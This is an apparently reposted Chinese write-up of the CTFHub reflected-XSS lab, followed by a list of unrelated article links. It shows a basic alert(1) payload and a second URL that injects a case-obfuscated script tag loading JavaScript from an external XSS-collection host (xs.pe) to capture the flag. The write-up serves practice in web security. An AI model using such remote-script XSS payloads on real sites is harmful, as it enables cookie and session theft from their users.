当前位置: 首页 > news >正文

反射型(CTFHUB)

news 2025/8/15 3:37:48

在上面输入什么名字,名字就会显示在URL和Hello,后面,插入XSS语句后成功

http://challenge-e16161e0e689d137.sandbox.ctfhub.com:10800/?name=<script>alert(1)</script>

将XSS语句插入第二个输入框中,发现需要一定格式才可以,于是我猜想将该网址的URL赋值进去,并且对name参数进行修改,将原本的xss语句变成xss平台的语句接受就好了

所以构造如下语句,得到flag

http://challenge-e16161e0e689d137.sandbox.ctfhub.com:10800/?name=<sCRiPt sRC=//xs.pe/HyM></sCrIpT>

http://www.dtcms.com/a/81796.html

相关文章:

  • JavaScript实现一个函数,将数组扁平化(flatten),即把多维数组转为一维数组。
  • LiteratureReading:[2023] GPT-4: Technical Report
  • xLua_003 Lua访问C#
  • 正确理解虚基类
  • Umi-OCR 实践教程:离线、免费、高效的图像文字识别工具
  • 基于STC89C52的DS1621温度检测系统
  • 【python3】:轻松实现点阵数据 转DXF格式
  • ROS2 常用命令详解
  • 第37周:文献阅读
  • java查询es超过10000条数据
  • 内容中台实施效能跃迁方法论
  • Python实现ONNXRuntime推理YOLOv11模型
  • AI 如何重塑数据湖的未来
  • git原理与常用命令及其使用
  • 数学建模:MATLAB卷积神经网络
  • 【嵌入式学习】触发器 - ADC - DAC
  • 微信 MMTLS 协议详解(五):加密实现
  • 【嵌入式硬件测试之道连载之第三章:核心处理器的选型与应用】
  • IS-IS原理与配置
  • Nexus L2 L3基本配置
  • 【Java SE】抽象类/方法、模板设计模式
  • 【递归,搜索与回溯算法篇】- 名词解释
  • 从X光片生成合成计算机断层扫描(CT)样成像的策略:一项范围审查|文献速递-医学影像人工智能进展
  • 【C++】sort函数的两种用法
  • 分布式容器技术是什么
  • 解决python配置文件类configparser.ConfigParser,插入、读取数据,自动转为小写的问题
  • AGI成立的条件
  • 算法及数据结构系列 - 回溯算法
  • 嵌入式芯片与系统设计竞赛,值得参加吗?如何选题?需要学什么?怎么准备?
  • QT开发(4)--各种方式实现HelloWorld